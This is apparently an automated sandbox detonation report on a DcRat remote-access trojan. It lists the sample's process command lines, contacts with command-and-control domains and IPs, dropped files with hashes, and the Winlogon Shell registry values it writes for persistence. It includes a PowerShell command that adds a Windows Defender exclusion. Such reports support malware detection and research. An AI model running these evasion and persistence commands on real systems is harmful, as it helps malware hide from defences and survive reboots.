"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre7\lib\dwm.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Cs9AbqBBxW.bat"
C:\Users\Public\Documents\containerRuntime.exe
"C:\Users\Public\Documents\containerRuntime.exe"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe
"C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 25350.client.sudorat.top | udp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| N/A | 127.0.0.1:1111 | | tcp |
| US | 8.8.8.8:53 | 25350.client.sudorat.ru | udp |
| US | 8.8.8.8:53 | 117813cm.n9shteam.in | udp |
| FR | 37.44.238.250:80 | 117813cm.n9shteam.in | tcp |
| RU | 31.44.184.52:25350 | | tcp |
| US | 8.8.8.8:53 | 729231cm.n9shteam1.top | udp |
| FR | 37.44.238.250:80 | 729231cm.n9shteam1.top | tcp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| RU | 31.44.184.52:25350 | | tcp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| RU | 31.44.184.52:25350 | | tcp |
| RU | 185.37.62.158:25350 | 25350.client.sudorat.top | tcp |
| RU | 31.44.184.52:25350 | | tcp |
| RU | 185.37.62.158:25350 | | tcp |
Files
\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
| MD5 | 10e817a4d5e216279a8de8ed71c91044 |
| SHA1 | 97c6fb42791be24d12bd74819ef67fa8f3d21724 |
| SHA256 | c60f74f6e164049e683a5f01b8cfea24aa85cbf6c7b31b765cbad16d8ab0d7b2 |
| SHA512 | 34421a517f5f1909afd694d24e22cafad9930725df964ba9c80666e9f0f2dcfdd2a254dcf6699e5797296ec3ae611593563779df05e3a617c7f8679a154dfd37 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe
| MD5 | a05e26d89c5be7e2c6408b09cd05cf74 |
| SHA1 | c24231c6301f499b35441615b63db6969a1762fd |
| SHA256 | 05628dfff22e15b219a711cf52a2c87521170853979f00fcd014cf164656418e |
| SHA512 | 8c8733f12dd71cfafd2edbfad487279d6ed971eb119b1cde92a905f4658a9b090f831f42ef2228a4f6c64071a1f54fb74708438b4361e317e36016897577913d |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
| MD5 | bc7804fca6dd09b4f16e86d80b8d28fa |
| SHA1 | a04800b90db1f435dd1ac723c054b14d6dd16c8a |
| SHA256 | 1628864ab0bafe8afea2ad70956b653550dab3db7c4cdf6f405e93a6c2441dce |
| SHA512 | 7534ac0a215f02af85bdf2b414e23face0570943f8820e7bfe97ea274ccd1a01618556e93b7465c2d9fbb0bcde5e97fab9e9b6bddd366554277ef308cde3a83c |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
| MD5 | e8c32cc88db9fef57fd9e2bb6d20f70b |
| SHA1 | e732b91cd8ac16fa4ce8ad9e639bf21d69f6bb45 |
| SHA256 | f787ce198538b1c0b2bfce8ce5297e34152cf6deebe559df6887f65c72a081a4 |
| SHA512 | 077307d42438f2b72d62ce9e35c67c09e1375c2e203e6d6d455c6c8861c6442b3d82f1345b6c76940f5e8015fe93491158a59b102fabd139c742d75c2c42ba7a |
memory/1684-47-0x0000000004620000-0x0000000005014000-memory.dmp
memory/2616-48-0x0000000000400000-0x0000000000DF4000-memory.dmp
memory/2836-58-0x0000000001210000-0x000000000150E000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe
| MD5 | d47062c8738a534fc931c0f341a61773 |
| SHA1 | c1175037a0e96363da56bc9d8abdb726cddc74fc |
| SHA256 | 484cc22b88e1eaae619f948e96812ebf70275f9e6408e2e3dbd8af827ac5199a |
| SHA512 | 9de6dcf7944ec9f2ff44c8fdbe562a6755c2af9800028b01fb0969921e6ef969c1ecc6e2ab129f191ac5feeaa9aa30cf436489dfee8e94433d6678a9942ffe39 |
memory/2616-60-0x0000000000400000-0x0000000000DF4000-memory.dmp
memory/2836-61-0x00000000005F0000-0x00000000005FE000-memory.dmp
memory/2836-62-0x0000000000A00000-0x0000000000A5C000-memory.dmp
memory/2836-63-0x0000000000AE0000-0x0000000000AF2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe.config
| MD5 | a2b76cea3a59fa9af5ea21ff68139c98 |
| SHA1 | 35d76475e6a54c168f536e30206578babff58274 |
| SHA256 | f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839 |
| SHA512 | b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad |
memory/1776-74-0x00000000013C0000-0x00000000016BE000-memory.dmp
memory/1776-75-0x0000000000C20000-0x0000000000C6E000-memory.dmp
memory/644-85-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-84-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/644-86-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-88-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-82-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-80-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-78-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-76-0x0000000000400000-0x00000000006FE000-memory.dmp
memory/644-90-0x0000000000DE0000-0x0000000000DF8000-memory.dmp
memory/644-91-0x0000000002390000-0x00000000023A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat
| MD5 | fbef3b76368e503dca520965bb79565f |
| SHA1 | 9a1a27526b8b9bdaae81c5301cd23eb613ea62ba |
| SHA256 | bcb2af67a4ea1e6aa341cf3141941dbe7b17f1911e7f20aba46552571f99c9f3 |
| SHA512 | 2b99bc9a945b6d9a2c0d3206dce9221eb7f4a2040c5096909d60c3278254c52b39a28dd18dd4e005eff0ebd7e7cba6dd3a6a94ea8a7d7598da3001da174db3f5 |
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
| MD5 | 00c4245522082b7f87721f9a26e96ba4 |
| SHA1 | 993a8aa88436b6c62b74bb399c09b8d45d9fb85b |
| SHA256 | a728f531427d89c5b7691f989e886df57d46f90d934448e6dabf29d64d0662bf |
| SHA512 | fdd8d2444b28883face793f6ea77913c2096a425e6101202536ea001c3df5e76a60a01673ee7a52eae827a12299b2727002895395315db190ec82ae11a68559f |
memory/2248-97-0x0000000001180000-0x0000000001188000-memory.dmp
memory/2248-98-0x000000001AB90000-0x000000001AC94000-memory.dmp
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat
| MD5 | 2fa8decc3dafe6f196f6c28769192e7c |
| SHA1 | 69f4e0cf41b927634a38b77a8816ca58c0bfb2de |
| SHA256 | 7e40eb542d164397c0bf17a47c8f0db79e7028299e9f180d38505220fd2cfb30 |
| SHA512 | c9fb6c2ac2441ff14673ccaa3f1d5e703356c093353992d302d34df6c9e26a85aba6760c3b98f0cd0ada45183c55b2e5cabc09978ca084077dd71743ca9fdbc1 |
\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
| MD5 | 52c95032ff8b8c3d4dfd98e51d8f6f58 |
| SHA1 | e841a32cb07adaad4db35b1f87b5df6e019eb9af |
| SHA256 | 39b35293e7efaa4cb94028e59872013bef4065788fef9fe3cd3206a8aee711e4 |
| SHA512 | a1177740ffbb476fb11f8112d98cabe3012ee3d54f2f848bb22ea99b53bd3526bf59065951fb6ef29f29408ab2fd90c942de65fe16d66a098abce8ba5d7d4e00 |
memory/1960-104-0x0000000001170000-0x00000000012CA000-memory.dmp
memory/2248-106-0x0000000000AB0000-0x0000000000ABE000-memory.dmp
memory/2248-108-0x0000000000AE0000-0x0000000000AFC000-memory.dmp
memory/1960-109-0x00000000002C0000-0x00000000002DC000-memory.dmp
memory/1960-112-0x0000000000300000-0x0000000000316000-memory.dmp
memory/2248-111-0x0000000000C90000-0x0000000000CA8000-memory.dmp
memory/1960-113-0x00000000002E0000-0x00000000002F0000-memory.dmp
memory/2248-115-0x0000000000AC0000-0x0000000000ACE000-memory.dmp
memory/2248-117-0x0000000000AD0000-0x0000000000ADC000-memory.dmp
memory/2248-119-0x0000000000CB0000-0x0000000000CBE000-memory.dmp
memory/2248-121-0x0000000000CC0000-0x0000000000CCC000-memory.dmp
memory/2248-123-0x0000000000CD0000-0x0000000000CDC000-memory.dmp
memory/2248-125-0x0000000000CE0000-0x0000000000CEE000-memory.dmp
memory/2248-127-0x0000000000CF0000-0x0000000000CFC000-memory.dmp
memory/1960-128-0x0000000000790000-0x000000000079E000-memory.dmp
memory/1960-129-0x00000000007A0000-0x00000000007AC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | dc98ca6ba78dd79031b468b4810e38dc |
| SHA1 | bf220e9ea3ea7a1d3f56b3b9169aded481a9f5c0 |
| SHA256 | c9cb635c1deef0897eb9b3ef25bdf3df7ccce08b1a7001e389014779cae05f03 |
| SHA512 | 1bb0b4414b9c7737dd94bac9ca602ad4221d00e66db2b2d6baf41b6282f317805fcc356f02bc37be5fab49787fdd90d1c1fd5211ef1dd58376ff157692c207c9 |
memory/2380-163-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/2184-164-0x00000000022C0000-0x00000000022C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ioi08Taqru.bat
| MD5 | 1136ecc0a95a58dfd27f6f032f11ebad |
| SHA1 | 73f44996f101096ccdb8ec1a075eaf3833ffc406 |
| SHA256 | 8e9aed3bc0a39c8a1ad1f118169d5b11c132c1e9d4ba1c5869f14738b88770ba |
| SHA512 | 9dea9cc4bbd082655406c02283eccd79d3b2fae27d80cb0d95359e94ecf75d9b2ca85f96d903678b1bcbbba6be9482633ba828f972ec1515df765dcdbd4ae6e0 |
\??\c:\Users\Admin\AppData\Local\Temp\gxqun3yq\gxqun3yq.cmdline
| MD5 | cd3788eb7c2c86243f992312c67107b3 |
| SHA1 | 9178ef7a189f35170d73c92dab567b61d360e9e2 |
| SHA256 | 972cecaaac083d67b19fd297bf2128f4e78ba9aa76e2a76e11be2b434da8deba |
| SHA512 | daeaf512a6fb3142edb623f50b8e16a65371f3e08e3f044740df39f604303d08ed5c3cc9e2d9b2de163e9ee7ddb09dc00050e67697084b624ca874492a43ee73 |
\??\c:\Users\Admin\AppData\Local\Temp\gxqun3yq\gxqun3yq.0.cs
| MD5 | b44da4c0f825b7f761030505c6da6b66 |
| SHA1 | 28b66051b40e3984435176efec7937fa759f3cd2 |
| SHA256 | 9dc450cf1df0857e9dd71d3f2b40c34406b1c105fa7249f6348ebb0a3541c9d2 |
| SHA512 | 6e15eb38d5af1c5db5bedb2d237325bd2ea02cf27425b94756855cc87e35dd4e58aca7c58f9b5270d214bed93e4d97e6eec26b8f52f2825533fb42420bfb4a7a |
\??\c:\Program Files\Windows Photo Viewer\en-US\CSC26E9B39D213245928B931B4D3D3897.TMP
| MD5 | 169bc6dc73ba66baacdb4d2a953f6ba6 |
| SHA1 | 539f14f124f21548bff9e0c4af763cd54fa1527d |
| SHA256 | bfc43c31534d80937c6af4f8db9a5e05c2982a7db57460cda32d95493f83d5e3 |
| SHA512 | 12b3a50df4d7bd16325af7d1e8cf2d4ed29cb6426538550168806b8bb73755f93f1622e60157efb3873ecc70bb1d9dc2e6ad276e7eed4a794af46f50089c969d |
C:\Users\Admin\AppData\Local\Temp\RES736B.tmp
| MD5 | 22c23a8104bfd0a9797b6a1c39c243ff |
| SHA1 | 6c839ded71ccbf4d1915696e6ac50d4d1e5f31ab |
| SHA256 | addb6332e532fc6f45d89588fbf3a2e9f67dd7bcaed1cd62b05b1c1885792177 |
| SHA512 | e3b442d4c30e93631b373d21c9f66b37b03fbf67c9bbdb19cef88fae858e120e1c174ed89cd8aa7a451e61eb4e04ed646f6371af456ca4d7d91dc4f844390b6b |
\??\c:\Users\Admin\AppData\Local\Temp\vyynnwny\vyynnwny.0.cs
| MD5 | 54dcbd4cddc517ecf37e0738b96eb246 |
| SHA1 | a4ec223c69bc253b988d8ec4b8c928befa0d2009 |
| SHA256 | cc72bbe28417b4950c994ac979c5073ea0ef7cb35f586519b26181bc0115a806 |
| SHA512 | 06a5dcb095311d1ae84ab764d5ec6f10ce1f99dbbcebdb8fa0f6de3dd41be15a281755a147dbb69843ca7575bb100ba2d7851070410667e0a4c4c837c32110ec |
\??\c:\Users\Admin\AppData\Local\Temp\vyynnwny\vyynnwny.cmdline
| MD5 | b40aa1c5723fa72cb06ab486fa83ab33 |
| SHA1 | ee3b6ccbbd01cfcee0a7d63c6dd886ed4c5fe106 |
| SHA256 | b77cddb52ce374967212c3daea38254c412c4d51581c8b77a9ccfc9b0bcfc5c6 |
| SHA512 | 83d1ce6faec96c30056790d520f6d2ee1dd598bdcf5ef0dbc81b1e06582422b3de15c0ae051bc57579b70b562dad1a651f077a62b9e4508eb77b784f17d86969 |
C:\Users\Admin\AppData\Local\Temp\RES7417.tmp
| MD5 | 30db2e0ee295e54b76f28c0d43c32b9d |
| SHA1 | 116c80fdae2985c43dffc82bbcac38663e0e3be8 |
| SHA256 | cfee47f43e2830c3598f2677ff476f90db6a5a67658811e624f45a7ab79170ad |
| SHA512 | 47e96cb332907b095fb2495d5d1d1db357a6e585b8f32a128ba519dc83108206357891d98aa37027df7ff1760b932cacd43064f0e86743d8098d242db0371f67 |
\??\c:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\CSCC87458AC71914A5D9817B7C12DDC47EA.TMP
| MD5 | beb071b378f7255ac19ff7e7e3135f6e |
| SHA1 | a09191db7295117df513f121d892c08f11b46eaa |
| SHA256 | a5c200a254b1c109dca75f477188c7fc29a2876874ea4aadfd5df94903f39e7f |
| SHA512 | 5bb54a1fb6f68f147c4a9fc170f8ae12cc5e94d2fcfe241bf262a771af4c0e8352dc1bcb9157c63696dc2a2407d15c5ef14d0213ac79b44b4092128924747a82 |
\??\c:\Users\Admin\AppData\Local\Temp\1gnpojgr\1gnpojgr.cmdline
| MD5 | 39e12c261d8c72139db68570730a10b8 |
| SHA1 | 2fae6b6609ef6e9974e6e2c47d7bdb6f003ef80b |
| SHA256 | d6a318a2cee117d658e844ca31f71c84e4dd50535cfd1513580ad0eb84c90958 |
| SHA512 | bee89d89e7f37d0a3f22f4f625faa23eaa018879a5c4e9058c48dc6087ac8c53a35fbcda24a1437c6c950736dd22886b908f1fb7203e477edeffbda605e1e6b1 |
\??\c:\Users\Admin\AppData\Local\Temp\1gnpojgr\1gnpojgr.0.cs
| MD5 | 85f873c32493eb4186341a57c58191d7 |
| SHA1 | a5b931237f2c21cf2c62a8990fdb7a49e10a1617 |
| SHA256 | b31e812da734042bc2326b9bd76927d4d74162adfd4983f66e0d606050aab5f2 |
| SHA512 | 2590fc305befbc9e416dd6ed2f01d749c9155f6ffd44c9095d8f6565f5c9583ec99c923ac2ac0a81e462709122e36d43a7bee0354ba08caba5d853d569048eed |
\??\c:\Windows\System32\CSC8AF8654FC13D48D0A5FAAA4B8D729FE.TMP
| MD5 | 8c85ef91c6071d33745325a8fa351c3e |
| SHA1 | e3311ceef28823eec99699cc35be27c94eca52d2 |
| SHA256 | 8db3e3a5515da1933036688a9b1918cfc3339fc687008c5325461271904b2d41 |
| SHA512 | 2bb89b07fe46b1c406ed6a560e88cb2b8402b1d61bb71e10887bad661751f64f1e5317fd6c1b301ea4766785b915da31b64e0475cfe36c1f950b32915b5dab7d |
C:\Users\Admin\AppData\Local\Temp\RES7494.tmp
| MD5 | 98cdb9ff1adfd1ea456cef86b0337bc7 |
| SHA1 | 7675b90f1ec5a2d5ea1ae2484a55f0fb316f5b3d |
| SHA256 | 9ebe5c5bc368f14caa5a3d72f024ce4f55a6b50346a115ec91d71864e7f2738f |
| SHA512 | 606d7c1bce8dd4c710fa680ff2307eeff07f4c8a0d895d2a754c3fc95112de4287a04d1dbf015347bedef517c0687fefdf7505258bada5f741d2f8f11d73ff39 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 41aeb53342ad5483bee1456b152ba0a3 |
| SHA1 | 133d14548698cd00caa892608ff527191c0092cf |
| SHA256 | 3a65dcedb6a184e0c22e45359b513b76ee0165c83e8db574220fc88cc342b7d6 |
| SHA512 | b73a28a19f904ac0066b8fa9a41473c99d51d985c6e7cbc2c919aea31467b722ae0ceaed73a0caead9e35497627c3045b21ce7d85e4a89e5a4dd28924ebdcc18 |
memory/1552-218-0x000000001B4C0000-0x000000001B7A2000-memory.dmp
memory/1552-220-0x0000000002180000-0x0000000002188000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MErU4jTVhT.bat
| MD5 | 48bd5ce29bcc06b7a9277d27483ac2a2 |
| SHA1 | 1f4706bbd7b583db0da605ceb72c7cca973ca0b4 |
| SHA256 | 0982f42e22fd38096c43af177b73066155e02d49fff1b483d04dec0bc0eca60a |
| SHA512 | c9128e042253404c29c74125342b6e6e9272847df23e37e65e5d6921dea352ad4168f224e30b2e0944806f6f943fc9cd06ae61cd92dc87306cbb127810eab4cf |
memory/2828-244-0x00000000013A0000-0x00000000013A8000-memory.dmp
C:\Program Files\Windows Photo Viewer\en-US\conhost.exe
| MD5 | 99f99dbcac6ebfe7231243248eb4c34f |
| SHA1 | 20f998db1d91e6ee20814e803554627d739d8f83 |
| SHA256 | 6fcd69e020f0dabc08164a755454aa5ba19f5f5ca1ac91d40f182909d47ef3c9 |
| SHA512 | d43baaa22b625d0ddbdeb2fd2088811b2588d9e494234374c69b377ea73946ace9d51cf355881b6d503dc2d0c4d56e8a6538149e43ce096a9f417c4a2bbb9bcc |
memory/1776-249-0x0000000000140000-0x000000000029A000-memory.dmp
memory/2512-248-0x0000000000970000-0x0000000000978000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2264-308-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
memory/3280-378-0x0000000000A70000-0x0000000000A78000-memory.dmp
memory/3640-379-0x0000000000A60000-0x0000000000BBA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-13 12:34
Reported
2025-01-13 12:36
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
DcRat
Dcrat family
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\", \"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\", \"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\", \"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\", \"C:\\Users\\Default User\\RuntimeBroker.exe\", \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\92.0.902.67\\OfficeClickToRun.exe\", \"C:\\Program Files\\Windows Security\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Mail\\MpDefenderCoreProtion.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\cmd.exe\", \"C:\\Program Files\\Internet Explorer\\SIGNUP\\dllhost.exe\", \"C:\\Recovery\\WindowsRE\\runtimesvc.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\WinRuntimePerfMonitor\\runtimesvc.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\upfc.exe\", \"C:\\Users\\Default\\Templates\\csrss.exe\", \"C:\\Program Files\\Windows Defender\\cmd.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Windows\\security\\conhost.exe\", \"C:\\Windows\\uk-UA\\fontdrvhost.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\sppsvc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\sihost.exe\"" | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
